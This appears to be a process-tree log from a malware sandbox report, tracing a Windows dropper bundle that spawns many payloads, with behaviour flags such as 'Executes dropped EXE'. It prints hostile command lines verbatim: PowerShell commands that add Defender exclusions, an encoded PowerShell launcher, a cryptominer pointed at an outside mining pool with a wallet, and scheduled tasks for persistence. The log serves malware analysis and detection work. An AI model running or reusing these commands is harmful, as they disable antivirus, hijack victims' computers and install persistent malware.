C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2488 /prefetch:19⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09792fda06e.exeTue09792fda06e.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 2767⤵
- Program crash
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue091e2054cef7.exeTue091e2054cef7.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'8⤵
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 2409⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe7⤵
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com8⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ynyegl.vbs"8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\9⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAEkAZAAgADcANwA2ADQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABnAGMAaAByAGQAZgBtAGEAYgAuAGUAeABlACIAOwAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABNAFMAQgB1AGkAbABkAC4AZQB4AGUAIgAgAC0ARgBvAHIAYwBlAA==8⤵
-
C:\Users\Admin\AppData\Local\Temp\gchrdfmab.exe"C:\Users\Admin\AppData\Local\Temp\gchrdfmab.exe"9⤵
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Arjnavlnnfsgdjk.vbs"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Chrome.exe'11⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe10⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com11⤵
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 a rx -k -u ETC:0xb0f43eE68f616bc263CCD517Be03329365dfe5E0.RIG02 -p x11⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09264824c4.exeTue09264824c4.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\8wixEKYkU3LAxAJFOjsTzj6U.exe"C:\Users\Admin\Pictures\Adobe Films\8wixEKYkU3LAxAJFOjsTzj6U.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\NNPY5106AAeVqilK_z_F08rO.exe"C:\Users\Admin\Pictures\Adobe Films\NNPY5106AAeVqilK_z_F08rO.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\19697758-d4d3-40ac-90bc-4f708ebf763b\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\19697758-d4d3-40ac-90bc-4f708ebf763b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\19697758-d4d3-40ac-90bc-4f708ebf763b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe" -Force8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PewpsFfSYiXuOGiFJvSIGG6e.exe"C:\Users\Admin\Pictures\Adobe Films\PewpsFfSYiXuOGiFJvSIGG6e.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\o4mHnIgSYQW7O5XO3gGRoCgQ.exe"C:\Users\Admin\Pictures\Adobe Films\o4mHnIgSYQW7O5XO3gGRoCgQ.exe"7⤵
-
C:\Users\Admin\Documents\Zp6jrl6hsJPQzXD4ofXJ6NcO.exe"C:\Users\Admin\Documents\Zp6jrl6hsJPQzXD4ofXJ6NcO.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\1UNlZrynJhGcHMClqAnAZqZA.exe"C:\Users\Admin\Pictures\Adobe Films\1UNlZrynJhGcHMClqAnAZqZA.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\VzVcnZabiuvGdgaUlbzDNo3w.exe"C:\Users\Admin\Pictures\Adobe Films\VzVcnZabiuvGdgaUlbzDNo3w.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7688 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dGnf4eToByXMuSt8IutgfRWU.exe"C:\Users\Admin\Pictures\Adobe Films\dGnf4eToByXMuSt8IutgfRWU.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 20410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iqSOY62OzrYU1YEu4gcHuylu.exe"C:\Users\Admin\Pictures\Adobe Films\iqSOY62OzrYU1YEu4gcHuylu.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\76sNFGK2BvYo5HLK0pdT0ET6.exe"C:\Users\Admin\Pictures\Adobe Films\76sNFGK2BvYo5HLK0pdT0ET6.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KLBRT.tmp\76sNFGK2BvYo5HLK0pdT0ET6.tmp"C:\Users\Admin\AppData\Local\Temp\is-KLBRT.tmp\76sNFGK2BvYo5HLK0pdT0ET6.tmp" /SL5="$502C6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\76sNFGK2BvYo5HLK0pdT0ET6.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-T3U6B.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-T3U6B.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\MBJEZCRQUI\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\MBJEZCRQUI\foldershare.exe" /VERYSILENT12⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Users\Admin\AppData\Local\Temp\b2-c8518-5ba-28089-31a29e654ba43\Laelulaekikae.exe"C:\Users\Admin\AppData\Local\Temp\b2-c8518-5ba-28089-31a29e654ba43\Laelulaekikae.exe"12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471814⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\59-abe67-5af-97290-fd2c3d228303d\Jafyferazhy.exe"C:\Users\Admin\AppData\Local\Temp\59-abe67-5af-97290-fd2c3d228303d\Jafyferazhy.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2yhmeh5e.k43\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\2yhmeh5e.k43\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\2yhmeh5e.k43\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\installer.exeC:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\installer.exe /qn CAMPAIGN="654"14⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630507832 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵
- Enumerates connected drives
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exeC:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exe"C:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exe" -u15⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ckywr5df.o53\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ckywr5df.o53\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ckywr5df.o53\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 24415⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e1oqww1i.szc\autosubplayer.exe /S & exit13⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\akhMUMUNUEvdQs_g_0zvWAt6.exe"C:\Users\Admin\Pictures\Adobe Films\akhMUMUNUEvdQs_g_0zvWAt6.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ff9fb8cdec0,0x7ff9fb8cded0,0x7ff9fb8cdee012⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tEs2w0pahcSWzgkDgmhbiTwD.exe"C:\Users\Admin\Pictures\Adobe Films\tEs2w0pahcSWzgkDgmhbiTwD.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\k93thIVrMWJ0ewTXFexvDtaK.exe"C:\Users\Admin\Pictures\Adobe Films\k93thIVrMWJ0ewTXFexvDtaK.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\k93thIVrMWJ0ewTXFexvDtaK.exe"C:\Users\Admin\Pictures\Adobe Films\k93thIVrMWJ0ewTXFexvDtaK.exe" -u10⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0956c36b51.exeTue0956c36b51.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 17927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue093cbcf0222440.exeTue093cbcf0222440.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue093cbcf0222440.exe" -u7⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exeTue0990c8b597f.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-TKLBT.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-TKLBT.tmp\Tue0990c8b597f.tmp" /SL5="$10218,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exe" /SILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-K99ID.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-K99ID.tmp\Tue0990c8b597f.tmp" /SL5="$20218,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exe" /SILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-EB598.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EB598.tmp\postback.exe" ss110⤵
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\1hR0WedLFCi2ffiQp2FL4Pi2.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\177C.exeC:\Users\Admin\AppData\Local\Temp\177C.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\177C.exeC:\Users\Admin\AppData\Local\Temp\177C.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\8411.exeC:\Users\Admin\AppData\Local\Temp\8411.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\8E73.exeC:\Users\Admin\AppData\Local\Temp\8E73.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8588 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\A7E7.exeC:\Users\Admin\AppData\Local\Temp\A7E7.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\C8DE.exeC:\Users\Admin\AppData\Local\Temp\C8DE.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1F1D.exeC:\Users\Admin\AppData\Local\Temp\1F1D.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 2443⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Program Files (x86)\Ziv1tvr\2d8wlrxv4k0.exe"C:\Program Files (x86)\Ziv1tvr\2d8wlrxv4k0.exe"2⤵
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 12a4c9cf975f8eb39ddebe440a4ece63 WngpQnQSq025SyXEi3KSag.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5352 -ip 53521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5132 -ip 51321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4428 -ip 44281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4556 -ip 45561⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2220 -ip 22201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\19697758-d4d3-40ac-90bc-4f708ebf763b\test.bat"1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\51ecad6f-8e20-45c6-87e3-c54a71f85ec3\test.bat"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3088 -ip 30881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 4944 -ip 49441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5620 -ip 56201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2640 -ip 26401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3812 -ip 38121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 828 -ip 8281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 1724 -ip 17241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2240 -ip 22401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6424 -ip 64241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 380 -p 7076 -ip 70761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 7056 -ip 70561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 5388 -ip 53881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2160 -ip 21601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7688 -ip 76881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6252 -ip 62521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 7680 -ip 76801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
